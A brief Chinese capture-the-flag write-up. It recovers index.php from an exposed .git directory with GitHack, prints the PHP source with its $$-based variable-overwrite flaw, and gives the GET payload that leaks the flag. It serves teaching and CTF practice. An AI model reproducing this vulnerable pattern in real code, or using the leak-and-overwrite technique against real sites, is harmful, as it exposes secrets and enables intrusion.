扫出来/.git/
利用GitHack拿到index.php
源代码:
<?phpinclude 'flag.php';
//flag.php:
//<?php
//$flag = file_get_contents('/flag');$yds = "dog";
$is = "cat";
$handsome = 'yds';foreach($_POST as $x => $y){$$x = $y;
}foreach($_GET as $x => $y){$$x = $$y;
}foreach($_GET as $x => $y){if($_GET['flag'] === $x && $x !== 'flag'){exit($handsome);}
}if(!isset($_GET['flag']) && !isset($_POST['flag'])){exit($yds);
}if($_POST['flag'] === 'flag' || $_GET['flag'] === 'flag'){exit($is);
}echo "the flag is: ".$flag;漏洞利用点:
GET提交的键值和键名都是可控的,存在 $$ 可以实现变量覆盖
$$x的意思就是把$x的值当作变量名再新创建一个变量,$$x=$$y的意思就是,比如说传进 ?name=test ,此时 $x=name,$y=test ,就会让$name=$text
$yds = "dog";
$is = "cat";
$handsome = 'yds';foreach($_GET as $x => $y){$$x = $$y;
}foreach($_GET as $x => $y){if($_GET['flag'] === $x && $x !== 'flag'){exit($handsome);}
}我们可以利用变量覆盖构造GET请求handsome=flag,此时通过foreach就会变成$handsome=$flag,就会把flag的值赋给$handsome。再满足if条件就可以输出$handsome也即是flag值了
/?handsome=flag&flag=kkk&kkk=111得到flag
